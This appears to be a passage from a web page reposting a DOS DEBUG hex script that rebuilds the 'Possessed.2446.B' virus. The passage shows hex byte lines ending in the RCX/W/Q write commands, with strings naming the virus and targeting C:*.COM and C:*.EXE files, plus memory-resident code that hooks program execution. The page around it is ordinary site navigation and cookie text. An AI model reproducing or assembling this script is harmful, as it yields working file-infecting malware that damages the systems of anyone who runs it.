E 0670 C7 06 7F 01 C9 00 C7 06 81 01 01 00 E8 2F 00 C7
E 0680 06 7F 01 BD 00 C7 06 81 01 FF FF E8 20 00 C7 06
E 0690 7F 01 C9 00 C7 06 81 01 FF FF E8 11 00 C7 06 7F
E 06A0 01 BD 00 C7 06 81 01 01 00 E8 02 00 EB B0 56 B0
E 06B0 01 B9 02 00 51 56 8A 1C 0A DB 74 16 8B CB 03 0E
E 06C0 7F 01 8A 54 01 03 16 81 01 B4 0C CD 10 83 C6 02
E 06D0 EB E4 5E 32 C0 59 E2 DC 5E C3 C7 44 12 70 19 8B
E 06E0 44 0E 05 10 00 2E A3 73 00 8B 44 10 2E A3 75 00
E 06F0 8B 44 14 2E A3 79 00 8B 44 16 05 10 00 2E A3 77
E 0700 00 8B 44 04 83 7C 02 00 74 01 48 BB 00 02 F7 E3
E 0710 03 44 02 83 D2 00 05 0F 00 83 D2 00 25 F0 FF 2E
E 0720 A3 7B 00 2E 89 16 7D 00 05 8E 09 83 D2 00 72 5E
E 0730 F7 F3 0B D2 74 01 40 89 44 04 89 54 02 2E A1 7B
E 0740 00 2E 8B 16 7D 00 BB 10 00 F7 F3 2B 44 08 2D 10
E 0750 00 89 44 16 C7 44 14 18 08 89 44 0E C7 44 10 8E
E 0760 0A 2E 8B 1E 61 00 E8 56 00 B9 1C 00 33 D2 B4 40
E 0770 E8 31 00 0E 1F 8B 16 7B 00 8B 0E 7D 00 B8 00 42
E 0780 E8 21 00 BA 00 00 B9 8E 09 B4 40 E8 16 00 E9 51
E 0790 FD 33 C0 8E C0 26 8E 16 F6 01 26 8B 26 F4 01 58
E 07A0 07 5D F9 C3 55 06 50 33 C0 8E C0 26 89 26 F4 01
E 07B0 26 8C 16 F6 01 58 07 9C 2E FF 1E 4F 00 5D C3 33
E 07C0 C9 8B D1 B8 00 42 E8 DB FF C3 51 56 28 04 46 E2
E 07D0 FB 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A
E 07E0 66 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A
E 07F0 78 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D
E 0800 86 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66
E 0810 9A 99 8D 94 97 5F 45 6F 94 93 6F 94 93 45 6C 9A
E 0820 92 87 86 45 94 8B 45 66 89 7A 2F 3F 41 4B 42 4B
E 0830 42 4C 43 4C 44 4C 45 4C 43 4D 46 4D 47 4D 44 4E
E 0840 48 4E 49 4E 4A 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A
E 0850 B5 4B B4 4B B3 4B B2 4B B4 4C B1 4C B0 4C B3 4D
E 0860 AF 4D AE 4D AD 4D B2 4E AC 4E AB 4E 4C 54 4C 55
E 0870 4D 55 4E 55 4F 56 50 56 51 56 52 56 53 56 54 57
E 0880 55 57 56 57 57 57 58 57 59 58 5A 58 5B 58 5C 58
E 0890 5D 58 5A 59 5B 59 5C 59 5D 59 60 59 5F 59 60 59
E 08A0 61 59 62 59 5B 5A 5C 5A 63 5A 64 5A 65 5A 66 5A
E 08B0 67 5A 5C 5B 68 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C
E 08C0 6E 5C 6F 5C 70 5D B1 53 B0 54 AF 54 AE 54 AD 55
E 08D0 AC 55 AB 55 AA 55 A9 55 A8 55 A7 56 A6 56 A5 56
E 08E0 A4 56 A3 56 A2 57 A1 57 A0 57 9F 57 9E 57 9D 57
E 08F0 9C 58 9B 58 9A 58 99 58 98 58 9A 59 99 59 98 59
E 0900 97 59 96 59 95 59 94 59 93 59 92 59 99 5A 98 5A
E 0910 91 5A 90 5A 8F 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B
E 0920 8A 5B 89 5B 88 5B 87 5B 86 5C 85 5C 84 5C 83 5C
E 0930 76 63 75 64 75 65 74 66 74 67 73 68 73 69 72 6A
E 0940 71 6B 71 6C 70 6D 70 6E 6F 6F 6E 70 6E 71 7B 71
E 0950 6D 72 7A 72 79 72 6D 73 78 73 77 73 76 73 75 73
E 0960 6C 74 71 74 72 74 73 74 74 74 6C 75 6D 75 6E 75
E 0970 6F 75 70 75 6B 76 6C 76 6D 81 6E 81 6F 81 70 80
E 0980 71 80 72 80 73 80 74 7F 75 7F 76 7F 77 7F 78 7E
E 0990 79 7E 7A 7E 7B 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D
E 09A0 81 7C 82 7C 83 7C 84 7C 85 7B 86 7B 87 7B 88 7B
E 09B0 89 7A 8A 7A 8B 7A 8C 7A 8D 79 8E 79 8F 79 90 79
E 09C0 91 78 92 78 93 78 94 77 95 77 96 76 97 76 98 75
E 09D0 00 43 3A 2A 2E 43 4F 4D 00 43 3A 2A 2E 45 58 45
E 09E0 00 06 33 C0 8E C0 26 80 3E EC 01 00 75 06 BE 00
E 09F0 01 E9 E8 01 07 8C C0 2E 03 06 73 01 8E D0 2E 8B
E 0A00 26 75 01 8C C0 2E 03 06 77 01 2E A3 51 01 2E A1
E 0A10 79 01 2E A3 4F 01 F8 2E FF 2E 4F 01 FC F3 A4 33
E 0A20 C0 8E C0 26 C6 06 EC 01 01 58 05 10 00 50 B8 6A
E 0A30 07 50 CB 8B C4 2D 00 01 8B E0 8C C8 8E D8 8E D0
E 0A40 1E 2D 10 00 8E C0 8C 06 81 00 50 26 A1 2C 00 A3
E 0A50 7F 00 58 1E 06 8E D8 0E 07 BE 0A 00 BF 8E 09 B9
E 0A60 06 00 FC F3 A5 BB 1C 08 89 1E 0A 00 8C 0E 0C 00
E 0A70 07 1F 07 BE 21 05 B9 42 00 51 B0 25 E8 4B FD BF
E 0A80 08 00 56 FC F3 A4 5E 59 F6 D8 E8 3D FD A1 18 07
E 0A90 05 1B 02 CD 21 89 1E 4F 00 8C 06 51 00 BA 4A 00
E 0AA0 80 EC 10 E8 FE FC C7 06 6B 00 00 00 8A 16 6E 00
E 0AB0 88 16 6D 00 05 E7 0F E8 EA FC 89 1E 53 00 8C 06
E 0AC0 55 00 BA 74 03 80 EC 10 E8 D9 FC 0E 1F 8E 06 81
E 0AD0 00 B4 49 E8 CE FC BA 8E 09 B1 04 D3 EA 83 C2 20
E 0AE0 B4 31 E8 BF FC 0E 0E 1F 8E 06 81 00 BE 8E 09 BF
E 0AF0 0A 00 B9 06 00 FC F3 A5 07 80 3E 4E 00 01 75 08
E 0B00 C6 06 4E 00 00 E9 97 00 A1 81 00 BE 9D 09 89 44
E 0B10 04 C7 44 02 80 00 89 44 08 C7 44 06 5C 00 89 44
E 0B20 0C C7 44 0A 6C 00 A1 7F 00 89 04 B4 30 CD 21 A2
E 0B30 4D 00 3C 03 72 1F 8E 1E 7F 00 33 F6 B9 C8 00 80
E 0B40 3C 01 75 0E 80 7C 03 3A 75 08 8B D6 83 C2 02 EB
E 0B50 15 90 46 E2 EA 0E 1F BE DE 08 BF 90 09 B9 0D 00
E 0B60 FC F3 A4 BA 90 09 FA 2E 8C 16 6F 00 2E 89 26 71
E 0B70 00 FB B8 00 4B BB 9D 09 2E 80 3E 4D 00 03 72 06
E 0B80 E8 21 FC EB 03 90 CD 21 FA 2E 8E 16 6F 00 2E 8B
E 0B90 26 71 00 FB 0E 1F 73 07 BA 08 00 B4 09 CD 21 B4
E 0BA0 4D CD 21 B4 4C CD 21 50 4F 53 32 34 34 36 42 2E
E 0BB0 43 4F 4D 00 81 C6 00 01 06 33 C0 8E C0 26 83 3E
E 0BC0 EC 01 00 74 13 07 83 EE 5A BF 00 01 B9 2D 00 FC
E 0BD0 F3 A5 BB 00 01 F8 FF E3 81 EE 8E 09 07 0E 1F BF
E 0BE0 00 01 B9 13 09 D1 E9 FC F3 A5 B9 7B 00 8C 06 51
E 0BF0 01 C7 06 4F 01 53 08 06 2E FF 2E 4F 01 E9 B9 01
E 0C00 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A
E 0C10 0A 54 68 69 73 20 69 73 20 50 6F 73 73 65 73 73
E 0C20 65 64 2E 32 34 34 36 2E 42 20 76 69 72 75 73 20
E 0C30 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20 66 72
E 0C40 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70 69 6E
E 0C50 65 73 2E 0D 0A 42 72

RCX
0B57
W
Q

ÄÄ POS2446B.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


EoF.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT